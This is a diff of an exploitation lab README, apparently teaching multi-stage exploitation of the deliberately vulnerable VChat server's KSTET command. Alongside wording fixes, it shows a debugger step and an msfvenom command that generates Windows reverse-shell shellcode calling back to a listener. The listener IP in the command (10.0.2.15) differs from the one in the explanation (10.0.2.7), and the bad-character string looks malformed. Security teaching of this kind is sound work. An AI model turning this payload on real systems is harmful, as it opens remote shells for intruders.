xinwenfu/VChat_KSTET_Multi/README.md

 		<img src="Images/I34.png" width=800>

 	3. Set a breakpoint on the `TEST EAX,EAX` instruction, and click run.
 Once you hit this click run again.
-Once you are satisfied this program is working correctly, as the EDI register should be incrementing; we can stop since there is no guarantee our Socket Handle will be a reasonably low number
+Once you are satisfied this program is working correctly, as the EDI register should be incrementing; we can stop since there is no guarantee our Socket Handle will be a reasonably low number.

 		<img src="Images/I35.png" width=800>

-2. Generate the second stage reverse shell code using ```msfvenom``` program, and create a exploit as shown in [exploit6.py](./SourceCode/exploit6.py)
+2. Generate the second stage reverse shell code using ```msfvenom``` program, and create a exploit script as shown in [exploit6.py](./SourceCode/exploit6.py)

 	```
 	$ msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=8080 EXITFUNC=thread -f python -v SHELL -b '\x00x\0a\x0d'
 	```
 	* `-p `: Payload we are generating shellcode for.
-    	* `windows/shell_reverse_tcp`: Reverse TCP payload for windows
+    	* `windows/shell_reverse_tcp`: Reverse TCP payload for Windows
     	* `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP 10.0.2.7
     	* `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080
     	* `EXITFUNC=thread`: Create a thread to run the payload